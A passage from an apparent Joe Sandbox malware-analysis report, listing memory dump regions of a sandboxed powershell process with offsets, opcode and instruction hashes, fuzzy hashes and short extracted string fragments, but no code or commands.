                                                                                                                                                                                    • Opcode Fuzzy Hash: 1943fad0c3f9692398130dca241e15bea7f607f9aa665081b2800aa54b64d820
                                                                                                                                                                                    • Instruction Fuzzy Hash: B2410E316442049FDB14DBB4D958AAE7BB6EF88750F184468E406AB7B1CF359D82CB90
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2053428549.0000000000D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D10000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_d10000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: c0830f67cd03b8779a22e0bc84726a061f82b42912107e65a75dfb81ff798cb5
                                                                                                                                                                                    • Instruction ID: 1c98f6fa5eb5daafa2a89ed228a9f3c7710d1a827827989aa34f7f2058f15fd1
                                                                                                                                                                                    • Opcode Fuzzy Hash: c0830f67cd03b8779a22e0bc84726a061f82b42912107e65a75dfb81ff798cb5
                                                                                                                                                                                    • Instruction Fuzzy Hash: 584135B0A005059FCB09CF98D5949BAFBB2FF48310B158199D905AB364CB36FC90CBA4
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2059984259.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_70a0000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: e9215ea4e126de9ccf7aedfd77779a69d4ce5d40cc5faafc1513575a9f69094f
                                                                                                                                                                                    • Instruction ID: 6588d86f809811fc35bbe5747a43d440a2628d45710cc46d359a7de39d585125
                                                                                                                                                                                    • Opcode Fuzzy Hash: e9215ea4e126de9ccf7aedfd77779a69d4ce5d40cc5faafc1513575a9f69094f
                                                                                                                                                                                    • Instruction Fuzzy Hash: 25314CB2700202EFDF161AE898116BABBD29FC2350F18C676D5419B2D1DF36D855C3E2
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2067110112.0000000008F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F90000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_8f90000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 96cd930ef06a3aa9d07eb863e41521ff6b45f44e85ec3b724eadd5eb408d324d
                                                                                                                                                                                    • Instruction ID: d29f42c3d1735600ea87c1dd1216b368b929b26f3bfb0fcc9dc47fb8e56b5123
                                                                                                                                                                                    • Opcode Fuzzy Hash: 96cd930ef06a3aa9d07eb863e41521ff6b45f44e85ec3b724eadd5eb408d324d
                                                                                                                                                                                    • Instruction Fuzzy Hash: B73119B4A00609DFCB14CF69C590AAAFBF1FF89310B248699D559EB365C732EC41CB90
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2052974379.00000000009FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009FD000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_9fd000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: ac59097383679d3c36945f3a55f47b1b34a77431d90e23eb4db771cfbaa4427a
                                                                                                                                                                                    • Instruction ID: f0eec14eb04f851606d1ffd132d7a5f47c4a030a70ced90cd396e12f22da96e4
                                                                                                                                                                                    • Opcode Fuzzy Hash: ac59097383679d3c36945f3a55f47b1b34a77431d90e23eb4db771cfbaa4427a
                                                                                                                                                                                    • Instruction Fuzzy Hash: E521CD76504244DFCF06CF10D9C4B26BF72FF58314F24C6A9E9094A666C33AD86ACB91
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2067110112.0000000008F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F90000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_8f90000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 8595f46fa8d10e11b9c906fa5c1e2ac61aab6b6a27c8581443ab17d405a5515c
                                                                                                                                                                                    • Instruction ID: 7355d5f29d00fbbdcddbfcdd8325d5ced7311763c59d918531403720db20edc7
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8595f46fa8d10e11b9c906fa5c1e2ac61aab6b6a27c8581443ab17d405a5515c
                                                                                                                                                                                    • Instruction Fuzzy Hash: DF01753590D3D55FC703A77D94645EA7F74EE83210B1540E7D0D48B1A3DA245849C7A5
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2052974379.00000000009FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009FD000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_9fd000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 8a04dbaedd5cfe19120f5b5096bc18b548c0362ffc51c90acb6922e5173cf6af
                                                                                                                                                                                    • Instruction ID: e069435d71fb892a52df971c52e51b52527eb69542ea28817927a353db3d0a64
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8a04dbaedd5cfe19120f5b5096bc18b548c0362ffc51c90acb6922e5173cf6af
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4301A77140A3489AE7104A25CD84777BF9DDF51324F1CC52AEE484B246CA79D945CBB1
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2053428549.0000000000D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D10000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_d10000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: cff2d5f28a7953f7511302f80b91cdfdc7b4dec431623ceef461d8cccb4a5dc7
• Instruction ID: b6f469c2260ec90ee974c1b558bfe98be58216eb6669e79ca68b42714c2cd0c2
• Opcode Fuzzy Hash: cff2d5f28a7953f7511302f80b91cdfdc7b4dec431623ceef461d8cccb4a5dc7
• Instruction Fuzzy Hash: 8D016D357042108F8B066B39E86847E3BA3EFD9622319445EE48AC7357DE698C868B52
Memory Dump Source
• Source File: 00000001.00000002.2053428549.0000000000D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_d10000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 01fdcd6dc63653ae84479f4d463e567c244464b668dbfc4aba1e877b086faef5
• Instruction ID: 010e0a40f3890d0d36ff56b323c71cb6c87b29fd7c73cba6f3c423fae1a5abca
• Opcode Fuzzy Hash: 01fdcd6dc63653ae84479f4d463e567c244464b668dbfc4aba1e877b086faef5
• Instruction Fuzzy Hash: 80F01D35700610DB86056B29E46887E77A7EBCD622315441EE98BC3356EE799C828B92
Memory Dump Source
• Source File: 00000001.00000002.2052974379.00000000009FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009FD000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_9fd000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 5d4aa0e96c27f3701bf380021ee597cf742bf62d6605182ca8af1d59144c90b5
• Instruction ID: 323f56c79d9b8beaaa6cc00608c60be8953f385c0a7acb33143f9313ab895152
• Opcode Fuzzy Hash: 5d4aa0e96c27f3701bf380021ee597cf742bf62d6605182ca8af1d59144c90b5
• Instruction Fuzzy Hash: DBF0C27100A344AEE7108A16CCC4B62FFACEF51334F18C55AED480F286C6799844CBB0
Memory Dump Source
• Source File: 00000001.00000002.2053428549.0000000000D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_d10000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 6a2787ea812bc77e5e987d744b457412dade532adc6c3de3b4d41441a4e22a51
• Instruction ID: 2f47e68b44d473b5cdeddc8e548a9f5bf48fa9fd1d8400cdeb68be6081b8d236
• Opcode Fuzzy Hash: 6a2787ea812bc77e5e987d744b457412dade532adc6c3de3b4d41441a4e22a51
• Instruction Fuzzy Hash: 6AE0E5709002499E8784DF788941199BFF0AB19210B2085AEC418DB222E7328A42CB91
Memory Dump Source
• Source File: 00000001.00000002.2053428549.0000000000D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_d10000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
• Instruction ID: 751e191de12ae14f989a7a566296f731112a01d130901daa809c3d79554a09dc
• Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
• Instruction Fuzzy Hash: 2CD06270D0420D9F8780DFADD94156DFBF4EB48210F6085BA9919D7311E73296528BD1
Strings
Memory Dump Source
• Source File: 00000001.00000002.2059984259.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_70a0000_powershell.jbxd
Similarity
• API ID:
• String ID: 4'^q$4'^q$84xl$84xl$84xl$84xl$tP^q$tP^q$tP^q$tP^q$$^q$(dq$(dq$(dq$(dq
• API String ID: 0-2339188973
• Opcode ID: 6e6bc5ab72a3f23435b87f78e11837d277445b4e54af37078a509d77e067c3ae
• Instruction ID: a56a8c2ce4c889d02b2dfec8d44a8c3396c95b17698d23d6aa716d7f970f6de9
• Opcode Fuzzy Hash: 6e6bc5ab72a3f23435b87f78e11837d277445b4e54af37078a509d77e067c3ae
• Instruction Fuzzy Hash: E9A14C70710209AFCB24DF98C54666FBBE2BF84310F148669E8059F394DB31EC41C7A1
Strings
Memory Dump Source
• Source File: 00000001.00000002.2059984259.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_70a0000_powershell.jbxd
Similarity
• API ID:
• String ID: 4'^q$4'^q$84xl$84xl$d%dq$d%dq$d%dq$d%dq$tP^q$tP^q$$^q
• API String ID: 0-3951631063
• Opcode ID: 36785c2c01437f4910aafbab52768985f4b3230ae060a268dda8d4c831e07410
• Instruction ID: fc81b279b3fda98becaae0eb211a4bb4033c5438a2e4aaf5a774e939131c7848
• Opcode Fuzzy Hash: 36785c2c01437f4910aafbab52768985f4b3230ae060a268dda8d4c831e07410
• Instruction Fuzzy Hash: 02714CB1B00216EFDB249FA8D956A7EBBE2AF85710F148669E9018F390CF31DD41C791
Strings
Memory Dump Source
• Source File: 00000001.00000002.2067188994.0000000008FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08FA0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_8fa0000_powershell.jbxd
Similarity
• API ID:
• String ID: 84xl$84xl$84xl$84xl$tP^q$tP^q$$^q$$^q$$^q
• API String ID: 0-71533908
• Opcode ID: 78ab167f01bc0eb8094e5c0cfd256de872787c2adf32d1d10afa5b54730b8463
• Instruction ID: a439a7a0402c473280abb7aa1dce9fe52a6d5c8eebab797962c3124f36362a34
• Opcode Fuzzy Hash: 78ab167f01bc0eb8094e5c0cfd256de872787c2adf32d1d10afa5b54730b8463
• Instruction Fuzzy Hash: 83D1D9B1F002049FCB149F79C95076ABBA2FFC8721F14846AE9059B391DB32DD45C7A1
Strings
Memory Dump Source
• Source File: 00000001.00000002.2067188994.0000000008FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08FA0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_8fa0000_powershell.jbxd
Similarity
• API ID:
• String ID: 84xl$84xl$84xl$84xl$tP^q$tP^q$tP^q$tP^q
• API String ID: 0-614951495
• Opcode ID: 3317597745ce19dd125d887b1758b1f29914853d30b4b79d2e169d95ff311056
• Instruction ID: b9f3b005baf893de32dc4469519373f6cf30ce5942d9451d4251f42a42e7980c
• Opcode Fuzzy Hash: 3317597745ce19dd125d887b1758b1f29914853d30b4b79d2e169d95ff311056
• Instruction Fuzzy Hash: 46C1C0B5F002099FCB14DF68C544A6ABBE6FF88721F248869E9059B390DB31DC56CBD1
Strings
Memory Dump Source
• Source File: 00000001.00000002.2067188994.0000000008FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08FA0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_8fa0000_powershell.jbxd
Similarity
• API ID:
• String ID: 84xl$84xl$84xl$84xl$tP^q$tP^q$tP^q$tP^q
• API String ID: 0-614951495
• Opcode ID: 6f0247c37fdcf90998ed3970f3ee8ecaafc8458ec6e02ac6aa916baf48f916d8
• Instruction ID: a8022d3eb3dd6d29b2b896bc0917aac94b72d411d2a2ea4aa81dd5fc3664d174
• Opcode Fuzzy Hash: 6f0247c37fdcf90998ed3970f3ee8ecaafc8458ec6e02ac6aa916baf48f916d8
• Instruction Fuzzy Hash: 1491C4B1F40204DFCB149F78C944A6ABBE6FBC8321F15886DE9069B394DA31DC82C791
Strings
Memory Dump Source
• Source File: 00000001.00000002.2059984259.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_70a0000_powershell.jbxd
Similarity
• API ID:
• String ID: 84xl$84xl$XRcq$XRcq$XRcq$tP^q$tP^q$$^q
• API String ID: 0-3956185284
• Opcode ID: 91d5b7ddf8c9d067864183183bbf0c58934d59b455b80388d2b4bb690b065182
• Instruction ID: 61eda65737e5625e0e8bfc50b879c7889cfe46abb181b8f379605f1aafefa892
• Opcode Fuzzy Hash: 91d5b7ddf8c9d067864183183bbf0c58934d59b455b80388d2b4bb690b065182
• Instruction Fuzzy Hash: 41613971B00106AFCB149FB98540A6ABBF2AF89310F24C669E9159F365CB71ED41CBA0
Strings
Memory Dump Source
• Source File: 00000001.00000002.2059984259.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_70a0000_powershell.jbxd
Similarity
• API ID:
• String ID: tP^q$tP^q$$^q$$^q$$^q$$^q$pl$pl
• API String ID: 0-1171304976
• Opcode ID: 1f20f22887bf7f899d2a2c27683a69582c76eaf46f90c1c5d67ce9bc8c573400
• Instruction ID: 32c779ae128e266682642b7d0bf0f06497609cc87e0d68c4ae744c05e671e0ec
• Opcode Fuzzy Hash: 1f20f22887bf7f899d2a2c27683a69582c76eaf46f90c1c5d67ce9bc8c573400
• Instruction Fuzzy Hash: 9A517AB1B04349EFDB244BBD9804B6ABBF6AF86310F18C16BE056CF291DA71C844C751
Strings
Memory Dump Source
• Source File: 00000001.00000002.2059984259.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_70a0000_powershell.jbxd
Similarity
• API ID:
• String ID: tP^q$tP^q$$^q$$^q$$^q$pl$pl
• API String ID: 0-3679457024
• Opcode ID: d6aab175c4ead1c2e52c6cf6e9983cd1a188ec18d25f1a62ce649952838335dd
• Instruction ID: 1e94fff60175d96f76e1413f6d1d2fcaf3fb613d55762f22127d0fb437bd3ca9
• Opcode Fuzzy Hash: d6aab175c4ead1c2e52c6cf6e9983cd1a188ec18d25f1a62ce649952838335dd
• Instruction Fuzzy Hash: 07518CB231435A9FC7544BB9D90062ABBE1AFC6620F2885AFD445CF361EA32DC45C791
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2059984259.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_70a0000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: 4'^q$4'^q$$^q$$^q$$^q$$^q
                                                                                                                                                                                    • API String ID: 0-3669853574
                                                                                                                                                                                    • Opcode ID: 631ed564b54f11a8c7e3e261f4e46bd9f330e7152f11f1e67510209912768c38
                                                                                                                                                                                    • Instruction ID: 71354583904a9770b2a2f009dfec5b162915d895e0d1fa2967c696ed6800090f
                                                                                                                                                                                    • Opcode Fuzzy Hash: 631ed564b54f11a8c7e3e261f4e46bd9f330e7152f11f1e67510209912768c38
                                                                                                                                                                                    • Instruction Fuzzy Hash: 46615DB1B0420AEFCB598FA9D40466E7BF2AF82310F14C6BAD455CFA59DB31C845C791
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2059984259.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_70a0000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: $^q$$^q$$^q$$^q$$^q$$^q
                                                                                                                                                                                    • API String ID: 0-2392861976
                                                                                                                                                                                    • Opcode ID: b4fcbec3731a0542bada8fb56ebbee05fabedf7e287c1ce83c1c29581e7e1315
                                                                                                                                                                                    • Instruction ID: 614939e98875a7522429ffc2412bdd66385044be1f5444176c78ce9b818a61a5
                                                                                                                                                                                    • Opcode Fuzzy Hash: b4fcbec3731a0542bada8fb56ebbee05fabedf7e287c1ce83c1c29581e7e1315
                                                                                                                                                                                    • Instruction Fuzzy Hash: F34129F1B04347AFDB654AA594402AABBF1AF85211F24C67FC446CF382DA36C855C791
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2059984259.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_70a0000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: 4'^q$84xl$d%dq$d%dq$d%dq$tP^q
                                                                                                                                                                                    • API String ID: 0-1648245520
                                                                                                                                                                                    • Opcode ID: 3857eb349ebacbd898a27b7526620f5b796f8208ba82250a0655ff08ae3d1c33
                                                                                                                                                                                    • Instruction ID: 0c9d965db0b0d83dfcb58305d98a7789acd5162361b0493aeb36fc42bb2d5f3c
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3857eb349ebacbd898a27b7526620f5b796f8208ba82250a0655ff08ae3d1c33
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1F31B1B1B00215EFD728DF98C549A6EBBF2BB89B10F248659E805AF350C731ED41CB91
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2059984259.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_70a0000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: 84xl$84xl$tP^q$tP^q$$^q
                                                                                                                                                                                    • API String ID: 0-1430180487
                                                                                                                                                                                    • Opcode ID: 8cdefc1dd56965d39c3c6cdbd9e654bd4b42d7fc458417f3528d33a0d153d296
                                                                                                                                                                                    • Instruction ID: ed15179b28e8f254a425072fa72db6be80e28d5d6224c4ab8298412a6aa907e9
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8cdefc1dd56965d39c3c6cdbd9e654bd4b42d7fc458417f3528d33a0d153d296
                                                                                                                                                                                    • Instruction Fuzzy Hash: 70613671B00206AFCB14DFA8C501AAABBF2AF84314F14C669E9159F395CB32EC41C7A1
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2059984259.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_70a0000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: 4'^q$4'^q$$^q$$^q$$^q
                                                                                                                                                                                    • API String ID: 0-3272787073
                                                                                                                                                                                    • Opcode ID: c1bc0e1a4c1f5dced3142a0bb6b541f180a18c47a139b574d71219f2db081caa
                                                                                                                                                                                    • Instruction ID: da51e15108f37b76a5f734f39c50d9cc6b869dfd443d2b82fb56af113c4d0d32
                                                                                                                                                                                    • Opcode Fuzzy Hash: c1bc0e1a4c1f5dced3142a0bb6b541f180a18c47a139b574d71219f2db081caa
                                                                                                                                                                                    • Instruction Fuzzy Hash: 264127B1B0430AAFDB555BB498106BE7BE2AFC1204F1485AAD505CF291EF36C895C7E2
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2059984259.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_70a0000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: 4'^q$4'^q$$^q$$^q$$^q
                                                                                                                                                                                    • API String ID: 0-3272787073
                                                                                                                                                                                    • Opcode ID: f92cf434ba71124abc4f0a41ae27ed78b4da3c2f3bf5c7ee19cf138f84601bdd
                                                                                                                                                                                    • Instruction ID: 6626de3431e33fae5888063331d543fe805b45a715b6269b5ade5c47cbe31c88
                                                                                                                                                                                    • Opcode Fuzzy Hash: f92cf434ba71124abc4f0a41ae27ed78b4da3c2f3bf5c7ee19cf138f84601bdd
                                                                                                                                                                                    • Instruction Fuzzy Hash: 58414DB1F00246FFCB198EA9AC0416EB7E1BF81220F24476BD821DF251DB35C969C751
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2059984259.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_70a0000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: 4'^q$tP^q$$^q$$^q$$^q
                                                                                                                                                                                    • API String ID: 0-3997570045
                                                                                                                                                                                    • Opcode ID: 2b41c54e7000b451e910089deaf579ec6fa5d67a2ded01287948242e98feba25
                                                                                                                                                                                    • Instruction ID: 4010beb84db30c8abaadb9c2ccec3f0a0d4d99dfc347de182605cf6003154694
                                                                                                                                                                                    • Opcode Fuzzy Hash: 2b41c54e7000b451e910089deaf579ec6fa5d67a2ded01287948242e98feba25
                                                                                                                                                                                    • Instruction Fuzzy Hash: 983102F1B00206FFDB648E84CA44FAAB7E1AF45760F19C26AD8255F2D0CB32D945CB91
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2067188994.0000000008FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08FA0000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_8fa0000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: tP^q$$^q$$^q$$^q$$^q
                                                                                                                                                                                    • API String ID: 0-324510305
                                                                                                                                                                                    • Opcode ID: 0c02d4215001009e75caa1f9fb7aed5508089f7969fbdc358caf3abb3f44c49b
                                                                                                                                                                                    • Instruction ID: b7a1a30bc0a5485a261a09a3500e98c82020687aa9ef74d45da847bc0039bf2c
                                                                                                                                                                                    • Opcode Fuzzy Hash: 0c02d4215001009e75caa1f9fb7aed5508089f7969fbdc358caf3abb3f44c49b
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4D21D1F6E00619CFEB248E74E944A6A77F4AFC4732B24406AE914AF351DF31D904C7A1
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2059984259.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_70a0000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: (o^q$(o^q$(o^q$(o^q
                                                                                                                                                                                    • API String ID: 0-1978863864
                                                                                                                                                                                    • Opcode ID: b5b2768be2c54861564ec3a93e7541c7efd3914a08c1896871ca904f11d964f2
                                                                                                                                                                                    • Instruction ID: 571fca0d34df7ae9590cac8872138871691753ff9e8dbaa9c14bd783a7ac5999
                                                                                                                                                                                    • Opcode Fuzzy Hash: b5b2768be2c54861564ec3a93e7541c7efd3914a08c1896871ca904f11d964f2
                                                                                                                                                                                    • Instruction Fuzzy Hash: 95F14971704346EFDB559FA8C8047AABBE2EF81310F1486AAE415CFA99CB32D845C791
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2059984259.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_70a0000_powershell.jbxd
Similarity
• API ID:
• String ID: 4'^q$4'^q$x.kk$-kk
• API String ID: 0-3904263387
• Opcode ID: 5a08f53ec4c606607553d76dc653d42c594ecb8d092cd15cdff55b418c8bd97d
• Instruction ID: 8ebcbb2708a74727f31157d1379928bd9b1cb53a499744a3849f5d3c470ce2a3
• Opcode Fuzzy Hash: 5a08f53ec4c606607553d76dc653d42c594ecb8d092cd15cdff55b418c8bd97d
• Instruction Fuzzy Hash: 4D0249B4A002199FDB24DB64CD51B9EBBF2BB89304F5081E5D9096B351CB72EE81CF90

Strings
Memory Dump Source
• Source File: 00000001.00000002.2067188994.0000000008FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08FA0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_8fa0000_powershell.jbxd
Similarity
• API ID:
• String ID: (fzl$(fzl$(fzl$(fzl
• API String ID: 0-3225199445
• Opcode ID: 5b77e5ffd6c4102cefed9a3e4e5f973fb8c2f94c37e35fdca02bb59316e6a3ba
• Instruction ID: ece1eb0aaecc8acae71fdf8dd09d9b88bc18971950d86ccab0bc412ad5fa8346
• Opcode Fuzzy Hash: 5b77e5ffd6c4102cefed9a3e4e5f973fb8c2f94c37e35fdca02bb59316e6a3ba
• Instruction Fuzzy Hash: 84C16EB4E00604DFDB14CFA8D540AAAB7F2BF88325F148569D805AB755CF32EC46CB91

Strings
Memory Dump Source
• Source File: 00000001.00000002.2059984259.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_70a0000_powershell.jbxd
Similarity
• API ID:
• String ID: 84xl$84xl$tP^q$tP^q
• API String ID: 0-357183423
• Opcode ID: 77be3e8faae2360e3c9f52b229868207d986313bbb456951089be6a68ca6bb78
• Instruction ID: 60f03ee3d18664624abe039fc34896ab4ada8e7fb233761148557dc173638d5a
• Opcode Fuzzy Hash: 77be3e8faae2360e3c9f52b229868207d986313bbb456951089be6a68ca6bb78
• Instruction Fuzzy Hash: C69149B1B00306AFCB545EA9C954A7ABFF6AF81710F1C897AD915CF391CA32D844C7A1

Strings
Memory Dump Source
• Source File: 00000001.00000002.2059984259.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_70a0000_powershell.jbxd
Similarity
